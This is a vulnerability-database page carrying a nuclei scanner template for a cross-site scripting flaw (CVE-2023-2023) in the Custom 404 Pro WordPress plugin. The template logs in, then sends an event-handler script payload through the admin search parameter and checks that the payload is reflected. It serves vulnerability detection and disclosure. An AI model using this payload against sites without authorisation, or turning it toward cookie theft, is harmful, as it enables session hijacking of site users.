Lucene search
K

Custom 404 Pro < 3.7.3 - Cross-Site Scripting

🗓️ 05 Jul 2026 03:01:21Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 27 Views

Custom 404 Pro < 3.7.3 - Cross-Site Scripting vulnerability in WordPress plugi

Related
Refs
Code
id: CVE-2023-2023

info:
  name: Custom 404 Pro < 3.7.3 - Cross-Site Scripting
  author: r3Y3r53
  severity: medium
  description: |
    Custom 404 Pro before 3.7.3 is susceptible to cross-site scripting via the search parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website.
  remediation: Fixed in version 3.7.3
  reference:
    - https://wpscan.com/vulnerability/8859843a-a8c2-4f7a-8372-67049d6ea317
    - https://wordpress.org/plugins/custom-404-pro/advanced/
    - https://nvd.nist.gov/vuln/detail/CVE-2023-2023
    - https://github.com/GREENHAT7/pxplan
    - https://github.com/thatformat/Hvv2023
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2023-2023
    cwe-id: CWE-79
    epss-score: 0.0171
    epss-percentile: 0.74566
    cpe: cpe:2.3:a:kunalnagar:custom_404_pro:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: kunalnagar
    product: custom_404_pro
    framework: wordpress
  tags: cve2023,cve,wpscan,xss,wordpress,wp-plugin,authenticated,custom-404-pro,intrusive,kunalnagar,vuln

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In
      - |
        GET /wp-admin/admin.php?page=c4p-main&s={{randstr}}%22%20style=animation-name:rotation%20onanimationstart=alert(document.domain)// HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - status_code_2 == 200
          - contains(content_type_2, "text/html")
          - contains(body_2, "onanimationstart=alert(document.domain)//")
          - contains(body_2, "Custom 404 Pro")
        condition: and
# digest: 4b0a00483046022100ce3472c9f5082d36dd79d33f14f14b57067dfcb7cd7a63a1ad25e264bd0a76960221009a3153ce57de96e8f99e144670520c7e8b265a8bea350eeec1c6db1467c1e05b:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6.8Medium risk
Vulners AI Score6.8
CVSS 3.16.1
EPSS0.0171
SSVC
27